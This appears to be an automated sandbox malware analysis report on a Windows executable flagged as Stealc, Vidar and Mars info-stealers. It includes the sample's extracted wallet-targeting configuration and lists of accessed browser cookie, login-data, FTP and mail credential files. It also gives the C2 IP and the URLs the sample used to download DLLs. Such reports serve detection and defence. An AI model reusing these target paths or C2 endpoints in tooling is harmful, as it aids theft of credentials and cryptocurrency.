Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: t13pv4ox18.exe, 00000000.00000002.2441113008.0000000001B60000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\t13pv4ox18.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\t13pv4ox18.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: Process Memory Space: t13pv4ox18.exe PID: 2788, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected Mars stealer
Source: Yara match File source: 0.3.t13pv4ox18.exe.3670000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.t13pv4ox18.exe.3670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.3640e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.3640e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1985985133.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441369088.0000000003640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2439993808.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2441189053.0000000001B91000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: t13pv4ox18.exe PID: 2788, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: 0.3.t13pv4ox18.exe.3670000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.t13pv4ox18.exe.3670000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.3640e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.t13pv4ox18.exe.3640e67.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1985985133.0000000003670000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2441369088.0000000003640000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2439993808.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: t13pv4ox18.exe PID: 2788, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C940C40 sqlite3_bind_zeroblob, 0_2_6C940C40
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C940D60 sqlite3_bind_parameter_name, 0_2_6C940D60
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C868EA0 sqlite3_clear_bindings, 0_2_6C868EA0
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C940B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C940B40
Source: C:\Users\user\Desktop\t13pv4ox18.exe Code function: 0_2_6C866410 bind,WSAGetLastError, 0_2_6C866410
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1436379 Sample: t13pv4ox18.exe Startdate: 05/05/2024 Architecture: WINDOWS Score: 100 38 Snort IDS alert for network traffic 2->38 40 Multi AV Scanner detection for domain / URL 2->40 42 Found malware configuration 2->42 44 9 other signatures 2->44 6 t13pv4ox18.exe 68 2->6         started        11 chrome.exe 9 2->11         started        process3 dnsIp4 26 185.172.128.151, 49704, 80 NADYMSS-ASRU Russian Federation 6->26 18 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 6->18 dropped 20 C:\Users\user\AppData\...\softokn3[1].dll, PE32 6->20 dropped 22 C:\Users\user\AppData\Local\...\nss3[1].dll, PE32 6->22 dropped 24 9 other files (none is malicious) 6->24 dropped 46 Detected unpacking (changes PE section rights) 6->46 48 Detected unpacking (overwrites its own PE header) 6->48 50 Tries to steal Mail credentials (via file / registry access) 6->50 52 7 other signatures 6->52 13 WerFault.exe 19 16 6->13         started        28 192.168.2.5, 443, 49527, 49703 unknown unknown 11->28 30 239.255.255.250 unknown Reserved 11->30 15 chrome.exe 11->15         started        file5 signatures6 process7 dnsIp8 32 plus.l.google.com 142.251.16.102, 443, 49718, 49759 GOOGLEUS United States 15->32 34 play.google.com 142.251.163.102, 443, 49757, 49758 GOOGLEUS United States 15->34 36 4 other IPs or domains 15->36
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.251.167.103
 www.google.com United States
15169 GOOGLEUS false
185.172.128.151
 unknown Russian Federation
50916 NADYMSS-ASRU true
142.251.16.102
 plus.l.google.com United States
15169 GOOGLEUS false
142.251.163.102
 play.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false

Private

IP
192.168.2.5

Contacted Domains

Name IP Active
plus.l.google.com 142.251.16.102 true
www3.l.google.com 142.251.167.138 true
play.google.com 142.251.163.102 true
www.google.com 142.251.167.103 true
ogs.google.com unknown unknown
apis.google.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.172.128.151/7043a0c6a68d9c65.php true
  • 18%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://185.172.128.151/8420e83ceb95f3af/softokn3.dll true
  • 17%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
http://185.172.128.151/8420e83ceb95f3af/vcruntime140.dll true
  • 4%, Virustotal, Browse
  • Avira URL Cloud: safe
 unknown
https://ogs.google.com/widget/app/so?awwd=1&gm3=1&origin=chrome-untrusted%3A%2F%2Fnew-tab-page&origin=chrome%3A%2F%2Fnew-tab-page&cn=app&pid=1&spid=243&hl=en false
    		high
    http://185.172.128.151/8420e83ceb95f3af/sqlite3.dll true
    • 20%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    http://185.172.128.151/8420e83ceb95f3af/freebl3.dll true
    • 7%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 false
      		high
      http://185.172.128.151/8420e83ceb95f3af/mozglue.dll true
      • 7%, Virustotal, Browse
      • Avira URL Cloud: safe
      		 unknown
      185.172.128.151/7043a0c6a68d9c65.php true
      • 18%, Virustotal, Browse
      • Avira URL Cloud: safe
      		 low
      http://185.172.128.151/8420e83ceb95f3af/nss3.dll true
      • 4%, Virustotal, Browse
      • Avira URL Cloud: safe
      		 unknown
      https://www.google.com/async/newtab_promos false
        		high
        https://play.google.com/log?format=json&hasfast=true&authuser=0 false
          		high
          https://www.google.com/async/ddljson?async=ntp:2 false
            		high
            https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw false
              		high
              https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.SCWmpDDGjPk.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/am=AAAC/rs=AHpOoo_Pl64J0IIHlj2zBtEJ3ZwdaJC3HA/cb=gapi.loaded_0 false
                		high
                http://185.172.128.151/8420e83ceb95f3af/msvcp140.dll true
                • Avira URL Cloud: safe
                		 unknown